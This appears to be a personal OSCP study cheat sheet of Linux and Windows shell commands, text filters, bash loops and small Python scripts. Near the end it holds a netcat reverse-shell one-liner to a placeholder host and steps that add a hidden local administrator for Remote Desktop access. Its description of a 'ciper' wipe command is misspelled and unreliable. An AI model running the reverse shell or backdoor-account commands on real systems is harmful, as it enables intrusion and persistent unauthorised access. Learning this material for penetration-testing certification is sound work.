Linux / WindowsMain commands

Linux main commands in OSCP
Find:
find / -name file 2>/dev/null
ls -ltr - Sort list by last modified. -time -reverse
​
# Remove recursively and its content. Very dangerous command!
rm -rf ./directory
List what rights the sudo user has.
sudo -l
# This will send all permissions denied outputs to dev/null.
find / -name file 2>/dev/null
Which
Outputs the path of the binary that you are looking for. It searches through the directories that are defined in your $PATH variable.
which bash
# Usually outputs: /bin/bash
​
Filters
#sort
sort test.txt
#uniq
sort -u test.txt
sort test.txt | uniq
cat filename | sort -u > newFileName
grep
​
head
​
tail
​
tr
​
sed
sed "1d"
​
#cut :
64 bytes from 192.168.0.1: icmp_req=1 ttl=255 time=4.86 ms
cut -d" " -f4
-d stands for delimiter. and -f for field.
​
tr - Translate
Transform all letter into capital letters
tr "[:lower:]" "[:upper:]" < file1 > file2
​
Remove character
# Remove characters
cat file.txt | tr -d "."
​
# Remove all dots and replace them with underscore.
cat file.txt | tr "." "_"
​
awk
awk '/search_pattern/ { action_to_take_on_matches; another_action; }' file_to_parse
​
awk '/172.16.40.10.81/' error.log
​
awk '{print}' filename
​
We can use the -F flag to add a custom delimiter. : awk -F ':' '{print $1}' test.txt
​
So if you are manipulating some text you might want to start the output with some info about the columns or something like that. To do that we can use the BEGIN-keyword.
awk 'BEGIN {printf "IP-address \tPort\n"} /nop/ {print $3}' test.txt | head
awk 'BEGIN{printf "IP-address \tPort\n"} /nop/ {print $3} END {printf "End of the file\n"}' test.txt | tail
​
# list cronjobs
crontab -l
​
# Edit or create new cronjobs
crontab -e
​
#List all devices
fdisk -l
​
#Systemctl
systemctl start ssh
systemctl status ssh
systemctl stop ssh
​
Netstat - Find outgoing and incoming connections
Netstat is a multiplatform tool. So it works on both mac, windows and linux.
$ netstat -antlp
​
netstat -anpt
​
iptables -L
​
# Remove one specific rule
iptables -D INPUT 2
​
​

Iteration over a file

This script will iterate over a file and echo out every single line:
#!/bin/bash
​
for line in $(cat file.txt);do
echo $line
done
​

Another Way

​
#!/bin/bash
​
while read p; do
echo $p
done <file.txt

For Loops

#!/bin/bash
​
for ((i = 0; i < 10; i++)); do
echo $i
done
​
Another way to write this is by using the program seq. Seq is pretty much like range() in python. So it can be used like this:
​
#!/bin/bash
​
for x in `seq 1 100`; do
echo $x
done
#!/bin/bash
​
locate 646.c | tail -n 1
​
This can be done like this:
#!/bin/bash
​
cat $(locate 646.c | tail -n 1)

VI Operators

VI -
Operators
Operators are commands that do things. Like delete, change or copy.
c - change
ce - change until end of the word.
c$ - change until end of line.
​
Combining Motions and Operators
Now that you know some motion commands and operator commands. You can start combining them.
dw - delete word
d$ - delete to the end of the line

Password Creation

openssl passwd sam
​

Windows Commands

cmd:
​
show hidden files:
dir /A
​
Print out file content, like cat
type file.txt
​
grep files
findstr file.txt
​
show network information
netstat -an
​
Show network adapter info
ipconfig
​
Traceroute
tracert
​
List processes
tasklist
​
Kill a process
taskkill /PID 1532 /F
​
Shreds the whole machine
ciper /w:C:\
​
Mounting - Mapping
wmic logicaldisk get deviceid, volumename, description
​

Scripts for fun

Make Request:
import requests
​
req = requests.get("http://site.com")
print req.status_code
print req.text
​
Read and write to files
​
file_open = open("readme.txt", "r")
for line in file_open:
print line.strip("\n")
if line.strip("\n") == "rad 4":
print "last line"
​
​
echo 'import os; os.system("/bin/nc ip port -e /bin/bash")' > /opt/tmp.py
​

​

Add RDP User

Windows
Add RDP user
net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add

Enable RDP via Registry

Enable rdp via regsitry
​